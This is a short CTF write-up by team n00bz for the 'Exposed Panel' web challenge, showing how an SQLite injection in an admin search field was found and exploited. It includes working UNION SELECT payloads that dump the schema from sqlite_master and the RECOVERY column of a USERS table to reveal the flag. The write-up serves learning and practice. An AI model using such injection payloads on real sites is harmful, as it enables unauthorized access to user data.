n00bz

Exposed Panel

Category

Web

Description

You found an exposed admin panel on a website where you can search the usernames of the users. Can you escalate this further?

Solution

Entering the page we get a single input field.

Admin Panel

Searching for % returns a list of users.

Users search result

Trying to search for '# returns an SQLite Error.

Warning: SQLite3::query(): Unable to prepare statement: 1, unrecognized token: "#" in /var/www/html/utils.php on line 8

Fatal error: Uncaught Error: Call to a member function numColumns() on bool in /var/www/html/utils.php:9 Stack trace: #0 /var/www/html/index.php(37): queryTable(Object(SQLite3), 'SELECT name FRO...') #1 {main} thrown in /var/www/html/utils.php on line 9

So we found an SQL injection, using the query index.php?query='+UNION+SELECT+sql+FROM+sqlite_master%3B%23 we get the tables and columns in the database.

Database Tables and Columns

If we change the query to index.php?query='+UNION+SELECT+RECOVERY+FROM+USERS%3B-- we can retreive the RECOVERY column from the table USERS.

Recovery Column of Table Users

And in the result we find the flag.

ASV{pHp_t@k3s_PhDs}

n00bz

Home of the n00bz CTF team.

Exposed Panel ASV DC29 CTF Write-up

By n00bz, 2021-08-20